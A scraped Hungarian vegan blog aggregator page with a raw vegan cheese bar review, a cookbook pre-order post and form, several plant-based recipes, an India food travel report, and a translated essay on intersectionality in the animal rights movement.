A ,,sajtokon kívül az én személyes kedvencem a nyers vegán fahéjas csiga volt. A kínálatot megtekintheted a Say Cheeze Raw facebook oldalán, vagy egyszerűen, ha ide kattintasz. Nem mellesleg a poharak, az evőeszközök és az elviteles csomagolás mind környezetbarát, komposztálható anyagokból készülnek, tehát a Say Cheeze Raw ötössel ment át a környezetbarát vizsgán is. A Say Cheez Raw ötletgazdái Mint minden vendéglátó egységben, a kiszolgálás itt is ugyanolyan fontos, mint a minőségi alapanyagok és a fergeteges ízek. Szerencsére a Say Cheeze Raw nem csupán hibátlan alapanyagaival és mennyei ízeivel lopja be magát az ember szívébe, hanem a pult másik felén álló duóval is. Egy tündéri párról, Sebestyén Mercédeszről és Paczkó Rolandról beszélünk. Mercédesz négy éve, Roland pedig három éve vegán. Valamikor egy évvel ezelőtt váltottak nyers vegán életmódra, és imádják minden percét. Bevallásuk szerint még sosem érezték ilyen jól magukat, egyébként ez látszik is rajtuk; sugároznak az egészségtől és a jókedvtől. A Say Cheeze Raw által egy kis szeletet át is adnak az embereknek ebből a ,,nyers energiából. A nyers vegán sajtalternatívákat először otthon, maguknak készítették, de azok olyan jól sikerültek, hogy környezetükben is nagy sikert arattak. Gasztronómiai kalandozásuk szépen lassan a bár megnyitásához vezetett. A Say Cheez Raw alapanyagok Mercédesz és Roland nagyon ügyelnek alapanyagaik minőségére. Egyik fő filozófiájuk, hogy csak olyan minőségű ételt készítsenek másoknak, amelyet ők is jó szívvel fogyasztanak. Nyersanyagaik többségét biopiacról, a szezonális alapanyagokat helyi termelőktől szerzik be. A további szükséges hozzávalókat egy közeli bioboltban vásárolják meg. Olyan minőségi alapanyagokkal dolgoznak, mint deglet nour datolya, német prémium minőségű kesudió és banán, hogy párat említsek. Minden termék, amit beszereznek bio és minden alapanyaguk vegán certifikációval rendelkezik. Ha hozzájuk mész jóllakni, akkor biztosra veheted, hogy nem csak finomat, hanem a legjobbat is kapod, ugyanis minden ételük 100%-ban organikus alapanyagokból készül, és mindent kézzel készítenek, hatalmas szeretettel és hozzáértéssel. Ha vegánként neked is hiányoznak a sajtok, vagy ha szeretnél kevesebb tejterméket fogyasztani, esetleg, ha szeretnél valami különlegességet kipróbálni akkor a Say Cheeze Raw a tökéletes választás számodra. Keresd fel őket személyesen és látogasd meg Facebook oldalukat is. Nyitvatartás: Hétfő: zárva Keddtől szombatig 11:00 és 19:00 között nyitva. Vasárnap: Zárva Cím: 1114 Budapest, Szabolcska Mihály utca 7.
Mit eszik a vegagyerek? szakácskönyv! :)
2017. április 20. Zizi kalandjai
Téli álmából felébredni látszik a blogomon, vagy inkább téli álomba szenderül, ahogyan a mai időjárás viselkedett… egy fantasztikus hírt oszthatok meg veletek. A válasz arra, hogy miért aludt a blog egy ideig, az az, hogy írtam/írok egy újabb szakácskönyvet, amelyet már néhányan nagyon vártatok! Amikor a Vegán Reggeli megjelent többen jeleztétek, hogy nagyon örültök neki, megvettétek, csodaszép, de mikor írok már vegagyerekes szakácskönyvet. A válaszom erre, hogy MOST!
A Vegán Reggeli után jött egy kis “lazítás”, majd belevetettem magam újra a recept tesztelésekbe. Főztem, ettünk, főztem, ettünk… tesztelték az ételeket az 1 éves és 3.5 éves családtagok, vagyis a vega gyerekek is. Azt hiszem mindegyik recept átment a teszten: “Anya, ezt berakhatod a könyvbe!” – jött a válasz.
A Mit eszik a vega gyerek? a mindennapok gyakorlatából összegyűjtött több mint 60 bevált recept (egy részük már megjelent a blogon, de a receptek többsége teljesen új) ennek megfelelően kizárólag természetes növényi alapanyagok (zöldségek, gyümölcsök, gabonák és magvak) felhasználásával készül (vagyis nem tartalmaz semmilyen állati eredetű élelmiszert: tejterméket, tojást, mézet, halat és húst), így mind a vegetáriánus, mind a vegán étrend iránt elkötelezettek, mind pedig a növényi alapú ételek iránt csak érdeklődők számára is remek útmutatásként szolgál. Ezenkívül a könyvben szereplő több recept hasznos forrása a gluténmentes és a cukormentes táplálkozást követőknek, a feltüntetett allergének pedig segítenek azoknak, akiknek valamilyen táplálékallergiára is ügyelniük kell.
Ez nem egy hozzátáplálási kézikönyv! A könyvben szereplő receptek 1 éves kortól 101 éves korig (vagy azon túl ) fogyaszthatóak, tehát egy teljes család számára biztosít könnyebb, egyszerűbb, gyorsabb és ráérősen készítős recepteket is, amelyek dietetikus által lettek ellenőrizve! A könyv öt fejezetre van bontva: reggeli, ebéd, vacsora, parti/desszert és alapreceptek. Az egyes fejezetekben lévő receptek jól kombinálhatók egymással. A reggelik édes ízvilágúak (turmixok, juice-ok, palacsinták, kásák), de ha valami sósra vágyunk, akkor a vacsora fejezet egyik kencéjét elkészítve máris van sós reggelink (meg inspirálódhatunk a Vegán Reggeli könyvből is). Az ebéd fejezet főtt ételek teljes sorát gyűjti csokorba. Nagyon sok a zöldséges gabonafasírt, a ragu, de van főzelék is. A vacsora részben is vannak meleg ételek, gyorsan elkészíthető levesek, tészták, de zöldség-hüvelyes kencék, valamint egy alap saláta is feltűnik. A parti/desszert rész többnyire édes dolgokat takar, de van benne egy-két sós finomság is – csakis olyanok, amelyek egy gyerekzsúron is megállják a helyüket és élvezettel fogják fogyasztani a gyerekek és a szüleik is. Az alapreceptek fejezet pedig olyan receptekből áll, amelyek alapok lehetnek a konyhánkban és többféle étel elkészítéséhez fel tudjuk őket használni, ilyen például a házi vegán parmezán, a kesudióvaj, a villámgyorsan elkészíthető ketchup, a szezámmagos (hamburger) zsemle vagy a kókuszjoghurt.
Nagyon izgulok, mert a fotókat most én készítettem… remélem tetszeni fog nektek!
Ezenkívül található a könyvben egy használati útmutató: bevásárláshoz, főzéshez, sütéshez ad tippeket, ötleteket. Írok a az egészséges táplálkozásról, hogy nekünk mi vált be, hogyan tudjuk rávenni a gyerekeket a spenót, a saláta vagy akár egy quinoa tabulé megevésére. A legbüszkébb pedig arra vagyok, hogy a Pécsi Tudományegyetem Egészségtudományi Kar Dietetikai és Táplálkozástudományi Intézete vállalta, hogy szakvéleményt (tudományos tényekkel alátámasztott bevezetőt) ír a könyvemhez! Hálás köszönetem Erdélyi Attila III. éves dietetikus hallgatónak, Szabó Zoltán szakoktatónak és Prof. Dr. Figler Mária egyetemi tanárnak, hogy vállalták ezt a nemes feladatot és alátámasztják a vegán táplálkozás fontosságát.
A Mit eszik a vega gyerek? egy vegán szakácskönyv, amely bemutatja, hogy a növényi étrenden belül is létezik a gyermekek kitűnő egészségéhez vezető, teljes értékű vegyes táplálkozás.
Külön köszönet a Boook Kiadónak, hogy láttak, látnak fantáziát a témában, a kiadó vezetőjének Széplaki Péternek, Földi Hajnal művészeti vezetőnek, B. Tier Noémi szerkesztőnek, Lukács Eszter dietetikusnak. Ezer hála a kiadó többi kollégájának: Adrinak, Kingának, Matyinak, Csillagnak, Enikőnek, Bereznay Tamásnak, Tóth Milánnak és Erdőháti Áronnak a sok segítségért.
A könyv nem jöhetett volna létre a családom (szüleim, öcsém), Iván és természetesen a vega gyerekek (Ádám és Ákos) támogatása nélkül!
A Biorganik egy fantasztikus cég, akik elláttak alapanyagokkal és támogatják a könyv létrejöttét. A Monkie (SkipHop Magyarország) nagyon sok eszközt biztosított a fotózáshoz, a Planetbio az utolsó pillanatban a segítségünkre érkezett egy nagy tasak kakaóbabtörettel és persze ott vannak a konyha angyalai: Gacsó Anikó (Bébispenót), Szabó Jucus (5hozzávaló) és Kósa Gabi (Rakottkert), akik káprázatosan főztek, sütöttek és a kezem alá dolgoztak a könyv fotózásakor. Nélkületek nagyon nehéz lett volna, csajok!
Hashtag, amit a könyvvel kapcsolatban használhattok a social media felületeken: #miteszikavegagyerekszakacskonyv.
Speciális előrendelési akció keretében 2017. április 30-ig csak most csak nektek a könyv a weboldalamon 25%-os kedvezménnyel, 3367 Ft-os áron megrendelhető az alábbi linken! A könyv várható érkezése: 2017. május vége!
A sikeres megrendelésről pár percen belül emailben értesítek mindenkit, amelyben minden információ szerepelni fog a fizetés, a személyes átvétel és a szállítás módjáról. 2017. május 1-től pedig 20%-os kedvezménnyel (3592 Ft) lehet majd a könyvet előrendelni az adott linken!
25%-OS KEDVEZMÉNNYEL 4490 FT HELYETT 3367 FT!
NAGY ZITA: MIT ESZIK A VEGA GYEREK? (Könyvrendelés!)
Zizi új könyve 25%-os kedvezménnyel elérhető a zizikalandjai.com blogon! (Postázni csak magyarországi címre tudunk jelenleg!)
Név*
Vezetéknév
Keresztnév
Email cím*
Email megadása
Email megadása újból
A véletlen elgépelés elkerülése céljából Számlacím*
Számlán szereplő név / cégnév
Utca, házszám (emelet, ajtó)
Város
Irányítószám
Személyes átvétel esetén is szükséges megadni, mert a jog így kívánja meg! Eltérő a postacímed?* NemIgen Postacím (számlacímtől eltérő)
Utca, házszám (emelet, ajtó)
Város
Irányítószám
Telefonszám (Futárnak szüksége lehet rá) KönyvHány darabot küldhetek 25% kedvezménnyel?* 1234567891011121314151617181920 Dedikálhatom a könyvet?NemIgen Hány darabot dedikálhatok?1234567891011121314151617181920 Ha többet rendelnél, mint 1 db, így könnyen meg tudod adni, hogy ebből hányat lássak el néhány kedves sorral, és hányat ne. Ha ajándéknak szánod a könyvet és szeretnéd, hogy a megajándékozandó személy részére dedikáljam a könyvet, akkor kérlek a megrendelést visszaigazoló e-mailre válaszolj, és írd meg, hogy kinek írhatom az ajánlást! Köszönöm! Kérlek válaszd ki a fizetés / átvétel módját!* Utánvét, MPL futár (10.000 Ft-ot meghaladó értékű megrendelés esetén ingyenes!)Készpénz, személyes átvétel - INGYENES! (BOOOK Kiadó ügyfélszolgálatán, 1095 Budapest Mester utca 87.) Kérlek válaszd ki a fizetés / átvétel módját!* Utánvét, MPL futár - INGYENES (10.000 Ft értékű megrendelés fölött)Készpénz, személyes átvétel - INGYENES! (BOOOK Kiadó ügyfélszolgálatán, 1095 Budapest Mester utca 87.) Fizetendő
0,00 Ft
Email Ez a mező az érvényesítéshez van és üresen kell hagyni.
if(typeof gf_global == undefined) var gf_global = {gf_currency_config:{name:Magyar Forint,symbol_left:,symbol_right:Ft,symbol_padding: ,thousand_separator:.,decimal_separator:,,decimals:2},base_url:http://www.zizikalandjai.com/wp-content/plugins/gravityforms,number_formats:[],spinnerUrl:http://www.zizikalandjai.com/wp-content/plugins/gravityforms/images/spinner.gif};jQuery(document).bind(gform_post_render, function(event, formId, currentPage){if(formId == 4) {gf_global[number_formats][4] = {1:false,23:false,3:false,9:false,4:false,6:false,14:decimal_comma,19:false,10:false,11:false,22:decimal_dot,21:decimal_dot,17:false,24:false};if(window[jQuery]){if(!window[gf_form_conditional_logic])window[gf_form_conditional_logic] = new Array();window[gf_form_conditional_logic][4] = { logic: { 4: {field:{actionType:show,logicType:all,rules:[{fieldId:9,operator:is,value:Igen}]},nextButton:null,section:null},11: {field:{actionType:show,logicType:all,rules:[{fieldId:10,operator:is,value:Igen}]},nextButton:null,section:null},22: {field:{actionType:show,logicType:all,rules:[{fieldId:19,operator:,value:2}]},nextButton:null,section:null} }, dependents: { 4: [4],11: [11],22: [22],21: [21] }, animation: 0, defaults: {1:{1.2:,1.3:,1.4:,1.6:,1.8:},23:{23:,23.2:},3:{3.1:,3.2:,3.3:,3.4:,3.5:,3.6:},9:,4:{4.1:,4.2:,4.3:,4.4:,4.5:,4.6:},14:{14.1:,14.2:,14.3:},10:,11:1}, fields: {1:[],23:[],3:[],9:[4],4:[],6:[],14:[],19:[22,21],10:[11],11:[],22:[],21:[],17:[],24:[]} }; if(!window[gf_number_format])window[gf_number_format] = decimal_comma;jQuery(document).ready(function(){gf_apply_rules(4, [4,11,22,21], true);jQuery(#gform_wrapper_4).show();jQuery(document).trigger(gform_post_conditional_logic, [4, null, true]);} );} if(window[gformInitPriceFields]) jQuery(document).ready(function(){gformInitPriceFields();} );} } );jQuery(document).bind(gform_post_conditional_logic, function(event, formId, fields, isInit){} ); jQuery(document).ready(function(){jQuery(document).trigger(gform_post_render, [4, 1]) } );
7 jótanács, hogy egészséges zöldségek teremjenek a kertünkben!
Mindenki, aki szeret kertészkedni, annak örül a leginkább, ha a nyár folyamán szép, egészséges és sok zöldséggel töltheti meg a kosarát. Nos, mivel ismét elérkezett a kertészkedés ideje, jó ha tisztában vagyunk pár alapvető dologgal, hogy gazdag termést takaríthassunk be. Következzen akkor 7 kertészeti jótanács. 1. Bórsav Ez a vegyület nagyon hasznos, mivel megvédi a […] The post 7 jótanács, hogy egészséges zöldségek teremjenek a kertünkben! appeared first on Filantropikum.com.
energiagolyó
2017. április 14. Beautilicious
Ha egy keményebb nap vagy épp edzés elött állsz, nagyon fontos, hogy megfelelő tápanyagokkal és energiával lásd el szervezeted. Az elkészítése pofon egyszeű, még sütni sem kell és nem igényel hosszú időt, ráadásul édesítőszer sem kell hozzá, mégis megédesíti a napod :). Hozzávalók: - 2kisebb répa - 65-70gr mazsola - 40gr zabpehely - 2tk fahéj Így készítsd - A mazsolát áztsd be forró vízbe - Tisztítsd meg a répát, majd vágd kis kockákra - Az összes hozzávalót tedd aprítóba, míg egy formázható állagú msszát nem kapsz - Gyúrj kis golyókat belőle+1 akár megforgathatod őket darált dióban vagy eritrites fahéjban
Tojásmentes, tejmentes zöldséges muffin
2017. április 13. Élj harmóniában
Tojásmentes, tejmentes zöldséges muffin A muffinokat nagyon szeretem, mert gyorsan el lehet készíteni és nagyon változatosak . Könnyű hozni vinni és nem csak reggelire, uzsonnára, de vacsorára is nagyon ideális. Ma egy zöldséges muffint készítettem. A férjemnek indulnia kellett itthonról ebéd után , de rájöttünk, hogy ma este 9-ig tanít és nem lesz vacsorája - pedig valamit mégis kellene ennie:) Tél vége lévén bio cékla szinte minden háztartásba könnyen beszerezhető, így ez nálunk is van minden héten. Ez adta az inspirációt:) Imádom a céklát, sütőben sütve egészben vagy párolt, sült subjikba (zöldséges főételekbe). Sajnos kicsit lassan készül el, mint a legtöbb zöldség, a muffinba ezért aprítóval készítettem elő. Hozzávalók 1 bögre púposan teljes kiő rlésű tönkölybúzaliszt 1 bögre púposan fehér tönkölybúzaliszt 1 csg. sütőpor 2 kis cékla 1 fél kis édeskömény 2 szál petrezselyem 1/4 tk kurkuma 1/4 tk graham masala 3 cm gyömbér 1/4 tk őrölt koriander csipet asafoetida (hing) só 1/3 bögre repceolaj 1 bögre víz Vegyszermentes (bio) alapanyagokat használj! A céklákat hámozd meg és a kis darab tisztított gyömbérrel, a fél édesköménnyel és a petrezselyemmel aprítógépben, aprítsd finomra - vagy reszeld le a céklát a többit vágd apróra. Keverd össze a liszteket, sütőport, fűszereket egy tálba. Keverd hozzá a céklás keveréket és öntsd hozzá az olajat, majd a vizet. Néhány lágy mozdulattal dolgozd össze a tésztát. Mindig leírom a muffin készítés egyik titka, hogy soha ne kevergesd hosszan a száraz összetevőket a nedvesekkel és ne hagyd sokáig állni. A dagold a tésztát a muffin formába - amit előtte papírformával bélelj ki vagy ki is vajazhatod, lisztezheted. Tedd 180 fokra előmelegített sütőbe és süsd készre (kb. 20-25 p).
Kirajzolódnak a határok – miért jó a megosztott állatjogi mozgalom?
Pár éve nő már a feszültség az állatjogi mozgalmon belül. Az interszekcionális szemlélet(1) egyre elterjedtebb, és egyre többen vizsgálják a fősodorbeli állatjogi mozgalmat kritikus szemmel. Az olyan vádakat, mint fehér vegánság (2), a vegán fogyasztói szemlélet, az embergyűlölő vegánságot sok helyről hallani. [tartalmi figyelmeztetés: nőgyülölő szitokszavak említése] írta: Veganarchy Egy hete egy híres vegán aktivista bejelentette, hogy vissza kíván vonulni az aktivizmustól, és ezért legfőképpen az interszekcionális szemlélet vegán közösségen belüli növekvő népszerűségét okolja. A Collectively Free Lilla Trenkovája volt olyan kedves, hogy összefoglalja a hoooosszú 2500 szavas esszét, hogy ne und magad halálra amíg elolvasod: most 2017-ben annyira elvékonyodott a fehér férfiúi törékenységem (3), hogy inkább felrobbanok, mintsem hogy bármit is tanuljak. Nyilván minden hatásnak van ellenhatása is, és ennek az aktivistának a visszavonulása nyomán fellángolt a vegán mozgalmon belüli szembenállás. Sokan határozottan kiállnak az ideológia álláspontjuk mellett, a Facebook tele van olyan hashtagekkel, mint a #FuckWhiteVeganism ( = bassza meg a fehér vegánság), vagy a #SJWCunts (kb = liberálfeminista pinák). És persze ott vannak azok, akik a pályán kívülről, tátott szájjal néznek, és hápognak, hogy mi történik a szeretett vegán mozgalmukban. Mind vegánok vagyunk, egységesen kéne kiállnunk! kiáltják. Bárcsak minden ennyire egyszerű lenne. Az egység valóban fontos, de kétféleképpen lehet elérni (bocsi, hogy nem megyek bele részetesen, hagyjál az egyetemi zsargonos sznobsággal, ez egy publicisztika): - Kamu (bullshit) egység: A fősodorbeli állatjogi mozgalom, ahol privilegizált fehér aktivisták dominálnak, és aminek botrányosan nincs semmi önkritikája, csak azt tanácsolja, hogy az emberek fogyasszanak vegán termékeket anélkül, hogy nagyobb összefüggésekben szemlélnék a kapitalizmust, a gyarmatosítást, és az elnyomás más formáit. Ez nemcsak, hogy figyelmen kívül hagyja az állatok elnyomásának a bonyolultságát, de a kritikus hangok elcsendesítése a mozgalomban elharapózik a rasszizmus, a szexizmus, a transzfóbia és egyéb elnyomó viselkedésformák, amik a hátrányosabb helyzetű csoportokat elidegenítik. Aki ilyen mozgalmat akar, az felszólítja az elnyomott embereket (és az ő szövetségeseiket), hogy üljenek le, kussoljanak, és szenvedjenek némán, ahelyett, hogy megtlálnék a saját helyüket, ahol erősnek érezhetik magukat. - Valódi egység: a valódi egységet úgy lehet elérni, ha figyelembe vesszük a más embercsoportok szükségleteit, és szolidaritást vállalunk az ő küzdelmükkel is. Ehhez az kell, hogy a privilegizált emberek (a társadalmilag domináns csoport tagjai) szerényebbek legyenek, hogy visszalépjenek és meghallgassák és tanuljanak másoktól. Ha egy queer személyt elcsöndesítenek amikor arról beszélne, hogy milyen kirekesztés érte a vegán mozgalmon belül, vagy egy színes bőrű ember kritikáját nem hallgatják meg, amikor arról beszél, hogy túlságosan gyarmatosító egy kampány üzenete, akkor nem hallgatjuk meg őket, és nem vesszük figyelembe a szükségleteiket, nem állunk mellettük a küzdelmükben. Az interszekcionális gondolkodás biztosítaná, hogy ezeket a hangokat lehessen hallani, és nemcsak ilyen kamu felejthető módon, hanem meghallgatni és aszerint cselekedni. Túl sokan vannak olyanok a vegán mozgalomban, akik nyíltan ellenzik az interszekcionális szemléletet, akik azt hadoválják, hogy az emberek elnyomásának nincs fontossága, hogy csak az állatok elnyomása számít. Ha tényleg egységes állatjogi mozgalmat akarunk, akkor van helyük ezeknek az embereknek benne? Ha igen, akkor a hátrányosabb helyzetű csoportok tagjai ugyan hogy fogják a magukénak érezni a vegán ügyet? Világos, hogy ha valójában egységes vegán mozgalmat akarunk, akkor a létre kell hoznunk a saját helyünket benne. A fősodorbeli vegán közösséget hiába is akarjuk megreformálni, mert ezek a helyek már merev konzervatív ideológiák mentén szerveződnek. Miért pocsékolnánk erre az energiánkat? Hagyjuk, hogy az ismeretlenségbe süllyedjenek, és néha nevessünk a cisz fehér férfiak felfújt egójának a csapkodásán. Ez egy felhívás. Most van itt az ideje, hogy létrehozzunk egy alternatívát. Vegyünk példát a Collectively Free-ről: jól bemutattak a fősodorbeli vegán közösségnek, és a saját útjukat járják az interszekcionális szemlélet, a befogadás és a társadalmi igazságosság mentén. Alapítsátok meg a saját csoportjaitokat, közösségeiteket és szervezeteiteket. Szerveződjünk és alakítsuk át az állatjogi mozgalmat. Oszd meg és uralkodj. Most már tudod, hogy a megosztottság jót tesz a társadalmi mozgalmaknak. Végülis... te dolgoznál együtt az állatjólétisekkel? ;-) Forrás: https://medium.com/@Veganarchy/the-lines-are-being-drawn-the-case-for-a-divided-animal-movement-4acd3ed8b2fd fordította: tudatosvegán A fordító jegyzetei: (1) interszekcionális szemlélet: az interszekcionalitás szót Kimberlé Crenshaw professzor kezdte használni azokra a helyzetekre, amikor az afrikai nők elnyomását bonyolította mind az afrikai mivoltuk, mind a női mivoltuk, tehát az élményeik különböztek mind a fehér nők tapasztalataitól, mind az afrikai férfiak tapasztalataitól. A pro-interszekcionális vegánság az állatok elnyomásán túl figyelembe veszi és aktívan küzd az emberek elnyomása ellen is (pl bőrszín/etnikum, nem, szexuális irányultság, életkor, fogyatékosság stb alapján történő diszkrimináció), felismerve, hogy az állatok és az emberek elnyomásának is ugyanaz az okozója. 2) fehér vegánság: rasszizmus a vegán mozgalmon belül, pl: az állatok elnyomását az afrikai rabszolgákhoz vagy a Holokauszthoz hasonlítani, majd felháborodni, ha valaki kritizálja ezt. Bővebben lásd (2) (3) fehér/férfiúi törékenység: a ford. jegyzete: sajnos nem találtam semmit arra, hogy a white(/male) fragility-t hogyan lehet magyarra fordítani, úgyhogy nekifutottam. Összefoglalva: a törékenység a társadalmi hierarchia domináns csoportjának a defenzív (negatív) reakciója, amikor szembesítik a saját elnyomó szerepével. Pl: egy férfi dühös lesz ha nőgyűlölettel vádolják, vagy egy fehér ember dühös lesz, ha rasszizmussal vádolják. A fehér törékenység pontos definíciója: a legkevesebb etnikai feszültség is elviselhetetlen, ezért defenzív reakciót okoz. Az [észak-amerikai] fehér emberek nagy része olyan társadalmi közegben él, ahol nem éri őket megkülönböztetés a bőrszínük alapján. Mivel a kulturális többség részei, ezért ritkán állnak szemben etnikai feszültséggel, de amikor igen, akkor ellenségesek, bűntudatosak, defenzívek vagy ijedtek lesznek. Robin diAngelo, http://libjournal.uncg.edu/ijcp/article/viewFile/249/116, idézi: http://www.salon.com/2016/07/18/white_fragility_is_real_4_questions_white_people_should_ask_themselves_during_discussions_about_race/ The post Kirajzolódnak a határok – miért jó a megosztott állatjogi mozgalom? appeared first on VegaNinja.
Zabpalacsinta sütőben sütve
Egy kis reggeli, egészséges kényeztetés. Míg a palacsinták a sütőben sülnek, van időnk mást csinálni, így nem kell a tűzhely mellett álldogálni. Foghatunk egy nagyobb tepsit, sütőpapírral kibélelve kis köröket formálunk a palacsinta tésztából a tepsibe, így tesszük be az előmelegített sütőbe. Persze, meg kell őket fordítani, miután az egyik oldaluk átsült. Másik lehetőség, ha van alacsony cupcake formánk (lásd az írásom végén a legutolsó kép), a muffinformáknál kisebb, alacsonyabb sütőforma, akkor abban is süthetjük. Szintén meg kell fordítani a palacsintákat. Ezt követően rajtunk áll, hogy mivel fogyasztjuk a mini-palacsintákat. Hasonlóan, mint az amerikaiak, tehetünk rá mogyorókrémet és/vagy lekvárt. Mogyorókrém helyett 100%-os mandulakrémmel, fagyasztásból kiengedett bogyós gyümölcsökkel és datolyasziruppal/agavésziruppal édesítettük. A mandulakrém meglehetősen drága, itt Angliában is, de pár napig volt egy boltban leárazás és akkor megkaptam nagyon nagyon olcsón. Az agavészirupot pedig ajánédkba kaptam, pont miután beszereztem egy datolyaszirupot, szóval fejedelmi lakománkat olcsón sikerült kivitelezni. Mégha drágák is ezek általában, szerencsére nem sokat kell belőlük használni, már kevés is jó ízt ad, sokáig elég lehet.
A recept
Hozzávalók:
- 2 nagyobb, érettebb banán (barnás héju banán ajánlott)
- kb 15 dkg őrölt zabpehely
- kevés növényi tej vagy víz
- gyümölcsök
- natúr mandulakrém
- datolyaszirup/agavészirup/méz
- tapadásmentes sütőlap
Elkészítés:
A banánokat villával összenyomkodjuk, majd hozzákeverjük a zabpehely-lisztet, s némi növényi tejet vagy vizet. Sűrű tészta kell legyen, ami nem folyik. Tapadásmentes sütőlapokra is helyezhetjük a palacsintákat vagy ahogy fentebb írtam, megsüthetjük sütőben is. Ha cupcake formában sütjük, érdemes egy kevés kókusz zsírral a formákat kikenni.
Ha megsült az alja, meg kell fordítani és a másik oldalát is átsütni.
Mandulakrémmel megkenve, rétegezve, hozzá sok-sok gyümölcsöt fogyasztva királyok által is irigyelhető reggeliben/desszertben lesz részünk.
Megkóstoltam Indiát - fényképes úti- és ételbeszámoló
2017. április 7. Vegetáriánus receptek
Évek óta tervezgettük, mindig fel-felmerült, hogy elutazunk Indiába: Móninak jóga miatt, én pedig végig kóstolok mindent, amit csak tudok. Ha sikerül, akkor egy főzőiskolába is beiratkozom. Aztán egyszer csak összeállt. Repülőjegy, szállások, oltás, izgalom: december elején indulunk Indiába. Szerveztem főzőiskolai részvételt, de nem tudtunk megegyezni az árban. Elolvastam a Nemzetközi étlapkalauz vonatkozó passzusát, elhatároztam, hogy megtanulom az alapanyagok és fűszerek neveit angolul, esetleg hindiül aztán persze nem lett belőle semmi. Így viszont izgalmasabb volt.
Érkezésünkkor bementünk Mumbai belvárosába, ahol nyakunkba ömlött India és igazi kultúrsokként hatott ránk. Minden-minden új és szokatlan volt. Másnap indultunk tovább az igazi célhelyünkre. Útközben egy nemzetközi gyorsétteremben tudtunk megbízható ételhez jutni, ahol jólesően meglepetés volt, hogy a burgerek nagy része vegetáriánus.
Az mindennapi ingeráradat a másik városban várt ránk, mivel utunk jelentős idejét itt töltöttük. Meleg, por, füst, szagok, forgalom, tömeg, zsivaj, állandó dudálás és mindennek tetejében baloldali közlekedés. Néhány nap alatt sikerült hozzászokni.
A csapvíz nem iható. Eleinte nagyon furcsa volt, hogy palackozott vizet volt szabad csak inni úgy, hogy esetenként a Bükkben a patakból is iszunk.
A mi fogalmaink szerinti bolt kevés, viszont utcai árusok, bárhol, bármit árulnak. Mintha az egész város egy nyüzsgő vásártér és street food fesztivál lenne. Ennek ellenére utcán nem ettünk, nem is tanácsolta semmi. Persze volt, hogy meginogtam, de győzedelmeskedett a józanész.
Az éttermek alapértelmezetten vegetáriánusok, ez jelentős könnyebbség volt bármely eddigi nyaralásunkhoz képest. Az Indiát már megjárt ismerőseink javaslatai, valamint az ú.n. Pune Guide szolgáltak alapul az éttermek felfedezésében. Igyekeztünk minél többe eljutni, és ha lehetett, akkor mindig olyat ételt választani, amit addig még nem.
Amikor csak lehetett fotóztam, jegyzeteltem. A fogások első ránézésre akár egyhangúnak is tűnhetnek (szósz és lepény). A szószok (gravy, shambar, sabji) igazából csak kinézetre és állagra voltak hasonlóak. Az ízük mind-mind különböző és mindegyik máshogyan volt finom, de elmondható ugyanez a lepényekről (chapati, naan, puri, stb.) is. Nyilván jobb lett volna több időt ott tölteni és más tájegységeket is megismerni legalább ennyire.
A képeket bő leírással láttam el, a beszámló ott folytatódik. Ahol csak tudtam feltüntettem az étel nevét, ahol sikerült ott az étteremet is.
Bliszkó Viktor
Meggyes túrótorta
2017. április 2. Beautilicious
Ebben a jó időben nincs is jobb, mint egy könnyű, hideg finomság, amit még sütnöd sem kell. Mikor elkészítettem, alig vártam a másnap reggelt, hogy végre ehessek belőle. Hozzávalók - 1zacskó túró (500gr) - 6ek tejföl - 1adag kávé - 150ml tej/növényi tej - rumaroma - 2ek natúr kakaópor - 2+5ek édesítő - egy citrom leve és héja - 300gr zabpehely - 150gr meggy Így készítsd - A zabpelyhet keverd össze a kakaóporral - Főzd le a kávét, majd tedd hozzá a tejet, 2ek édesítőt majd egy kis rumaromát - Öntsd le vele a zabpelyhet, majd tedd félre, és hagyd, hogy összeálljon - Addig készítsük el a krémet: Keverd össze a túrót a tejföllel és 5ek édesítővel - Reszeld hozzá a citrom héját, majd nyomkodd ki a levét - Forgasd bele a meggyet - A zabpelyhet öntsd jénai tálba és egyenletesen oszlasd el - Mehet rá a túrókrém - Tedd egy éjszakára a hűtőbe, hogy összeérjenek az ízek
Vegán marhahús-pótló
Avagy a Bocibarát vegadarált Drága édesanyám imádja a prézlis karfiolt, engem meg a világból ki lehet kergetni az illatával is. Szóval, nem vagyok egy nagy karfiolrajongó. Illetve eddig nem voltam. Aztán megláttam egy receptet. Kicsit felturbóztam, szájam ízére szabtam, és csak ámulok és bámulok. Az eredmény egyszerűen mennyei! Tanulság, hogy nincs olyan, hogy nem szeretek egy zöldséget, csak meg kell tanulni elkészíteni, vagy inkább a saját ízlésünk szerint elkészíteni. És a sós vízben főzésnél nekem még az is jobb, ha nyersen eszem azt a zöldséget. :) Hozzávalók kb. 25-30 dkg-hoz: - fél fej karfiol - 125 g dió - 3 ek olívaolaj - 3 ek szójaszósz - 1 ek ketchup - 1 ek pirospaprika - 1 kk balzsamecet - 1 kk bio ételízesítő - fél kk só, bors - A karfiolt szabadítsuk meg a zöldjétől, és szedjük kisebb rózsákra. Késes aprítóban daráljuk össze a többi hozzávalóval, és ha szükséges, közben töltsünk hozzá fél-egy dl vizet. - Ezután öntsük át egy nagy serpenyőbe, és kezdjük el pirítani. - Közepes lángon időnként megkeverve süssük, amíg rozsdabarna nem lesz. Kb. fél óra alatt megvan. Extra tipp: Érdemes egyszerre többet csinálni belőle, jól viseli a fagyasztást is. Az eredeti receptet itt találjátok http://laveganista.blog.hu/2013/03/25/vegan_daralt_marhahus
Ezt ettem ma 2017. március 16 csütörtök
2017. március 18. Gitta nyersétel blogja
Reggeli: narancsos-petrezselymes zöld turmix, sűrűn, benne banán, goji bogyó és chia mag. Most úgy fotóztam le, hogy minden bele van keverve... Zöld turmix Napközben: be kell, hogy valljam töredelmesen, hogy egész nap jégkrémet ettem. Nem a böjt része, hanem most egy ilyen projekten dolgozom, egészséges jégkrémek receptjét kisérletezzük egy vállalkozás részére. Nagyon sokat kell kóstolni... :) Alapanyagok: gyümölcsök, kókuszkrém, kókuszreszelék, kesudió... stb... egészséges jégkrémek Vacsora: nyers vegán tortilla zöldségekkel, balzsamecettel :) No ez viszont király volt... nyers vegán tortilla hajlékony az almától Még szerdán aszaltam három lapot (50 dkg alma, 10 dkg spenót pici sóval összeturmixolva, és 20-20 dkg-os lapokra megaszalva). Rugalmas, picit édes, picit sós, remek alapja egy zöldség tekercsnek. avokádó és savanyú káposzta saláta és paprika a tetejére csírák Megtöltöttem avokádóval, savanyú káposztával, saláta levelekkel, aszalt olajbogyóval, kápia paprikával, csírákkal (vagy hát lehet ezt bármivel, ami otthon van), feltekertem, és meglocsoltam modenai 